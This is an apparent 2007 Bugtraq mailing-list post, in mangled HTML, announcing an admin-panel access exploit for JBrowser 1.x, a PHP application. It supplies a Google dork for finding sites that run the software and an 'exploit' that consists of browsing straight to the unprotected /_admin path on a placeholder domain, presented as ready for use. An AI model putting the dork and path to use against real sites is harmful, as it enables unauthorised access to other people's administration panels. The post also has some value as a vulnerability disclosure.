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JBrowser Acces to Admin Panel Exploit
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: JBrowser Acces to Admin Panel Exploit
- From: crazy_king@xxxxxxxx
- Date: 23 Feb 2007 17:49:52 -0000
<title>JBrowser Acces to Admin Panel Exploit</title>
JBrowser Acces to Admin Panel Exploit<p>Languane : PHP </p>
<p>Version: 1.x</p>
<p>Website : http://www.alizecheval.com/jbrowser/_admin/</head></p>
<p>Author : sn0oPy</p>
<p>Exploit Code : Cr@zy_King</p>
Contact: <a href="mailto:crazy_king@xxxxxxxx">crazy_king@xxxxxxxx</a><br>
Google Dork : inurl:"JBrowser/index.php"<body></body><body></body></p>
Exploit : <a href="http://siteadresi.com/patch/_admin">
http://siteadresi.com/patch/_admin</a> ---> Go To Admin Panel</p>
<input type="button" name="http://siteadresi.com/patch/_admin"
value="Administrator" style="font-family: Arial (sans-serif)" class="sd"
<b>Exploit Coded By Cr@zy_King</b>